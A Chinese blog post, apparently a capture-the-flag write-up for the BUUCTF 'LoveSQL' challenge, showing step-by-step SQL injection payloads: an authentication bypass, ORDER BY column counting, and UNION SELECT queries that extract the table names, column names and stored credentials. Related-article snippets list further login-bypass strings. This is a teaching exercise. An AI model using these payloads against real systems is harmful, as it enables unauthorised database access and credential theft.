九、[极客大挑战 2019]LoveSQL

最新推荐文章于 2022-10-04 16:58:01 发布
最新推荐文章于 2022-10-04 16:58:01 发布
阅读量59 收藏
点赞数
分类专栏: BUUOJ_Web_Writeup 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xiyuer_/article/details/121771818
版权

1.打开题目
在这里插入图片描述

2.题目分析
① 输入万能密码:1’ or ‘1’='1
登录:
在这里插入图片描述

跳转到了check.php页面。并得到了用户名和密码:
在这里插入图片描述

② 查询字段数,在url中输入:
/check.php?username=admin’ order by 3%23&password=1 存在
在这里插入图片描述

/check.php?username=admin’ order by 4%23&password=1 报错
在这里插入图片描述

注意:此时是在url中输入的,所以不能用#,而用其url编码%23。
③ 可知共3个字段。用union查询测试注入点(回显点位):
/check.php?username=1’ union select 1,2,3%23&password=1
在这里插入图片描述

④ 得到回显点位为2和3,查询当前数据库名及版本:
/check.php?username=1’ union select 1,database(),version()%23&password=1
在这里插入图片描述

⑤ 可知当前数据库为geek
接下来:
爆表
/check.php?username=1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
在这里插入图片描述

⑥ 爆出这两个表,我们试一下l0ve1ysq1这个表:
爆字段:
/check.php?username=1’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘l0ve1ysq1’%23&password=1
在这里插入图片描述

⑦ 得到这三个子段,
爆数据:
/check.php?username=1’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
在这里插入图片描述

3.获取flag
在这里插入图片描述

囍语儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
老有人问,那就放一些常用的手工SQL注入的
无言的世界~~ 无心,无情,无爱,无缘,无义,无怨,无..........
03-10 533
' or 1='1 1′ and 1=1 –+ ‘or 1=1# 01:"or "a"="a 02:')or('a'='a 03:or 1=1-- 04:'or 1=1-- 05:a'or' 1=1-- 06:"or 1=1-- 07:'or'a'='a 08:"or"="a'='a 09:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1...
sql注入万能密码 admin 'or '1'='1'# (# 为注释后面内容)
wjwqp的专栏
03-01 1万+
admin 'or '1'='1'# (# 为注释后面内容) admin'-- admin'or4=4-- admin'or'1'='1'-- admin888 "or"a"="a admin'or2=2# a'having1=1# a'having1=1-- admin'or'2'='2 ')or('a'='a or4=4-- c a'or'4=4-- "or...
[极客挑战 2019]LoveSQL
weixin_52116519的博客
04-13 1119
考点:常规的sql注入 1、万能密码测试 2、解不了码,没用 3、但是可以注入,测试回显几个字段名,慢慢试 4、爆数据库名和用户名 5、 爆库名 6、爆表名 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()# 7、爆列名 1' union select 1,2,group_concat(column_name) from inform
[极客挑战 2019]LoveSQL 1
B_cecretary的博客
07-28 346
[极客挑战 2019]LoveSQL 1
[极客挑战 2019]LoveSQL1
weixin_41571993的博客
10-04 320
靶场练习
极客挑战2019LoveSQL解题
Bird&Bird
10-25 1968
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
BUUCTF WEB 极客挑战 2019 LoveSQL
Ethan552525的博客
07-27 504
题目: 解题: 1:输入万能密码 用户名:admin' or 1=1# 密 码:1 2:确定回显列 用户名:1' union select 1,2,3;# (select 1,2...逐步增加,直到不报错即得到正确的列数) 密 码:1 说明查询列数为3,回显列为2,3。 UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 ...
BUUCTF Web [极客挑战 2019]LoveSQL
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之的同期选手。 一、题目简介 进入题目连接是一个「登录」界面 登录「成功」会显示当前用户的账号和密码 登录「失败」则会则会提示错误的用户名和密码 二、思路分析         这一关是「SQL注入」漏洞,注入点.
buu [极客挑战 2019]LoveSQL 1
weixin_45642610的博客
01-10 1851
buu [极客挑战 2019]LoveSQL 1 -刷题个人日记 小白一个,写给自己看。 进去后是这样: 用户名输入1和1'测试 发现1'报错 有sql语法错误,说明有sql注入点且后台数据库是MariaDB 用户名输入sql注入基本公式:1' or 1=1;# 结果: 3bba40d66c98e28cf3bac11b45edbbab像是md5编码,试试解码后不行。 可能flag在其他表里,我们要知道有哪些表且表的属性有哪些。 慢慢来,payload: check.php?username=admin'
buuctf-[极客挑战 2019]LoveSQL
m0_62008601的博客
04-04 2732
一道基础的sql注入
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
OGSM绩效管理培训材料双份资料.pptx
07-12
OGSM绩效管理培训材料双份资料.pptx
CAD机械设计赛项单选题样题.docx
07-12
CAD机械设计赛项单选题样题
100款古风PPT (79).pptx
最新发布
07-12
【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
搭建zookeeper
07-12
搭建zookeeper
极客挑战 2019]LoveSQL 1
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值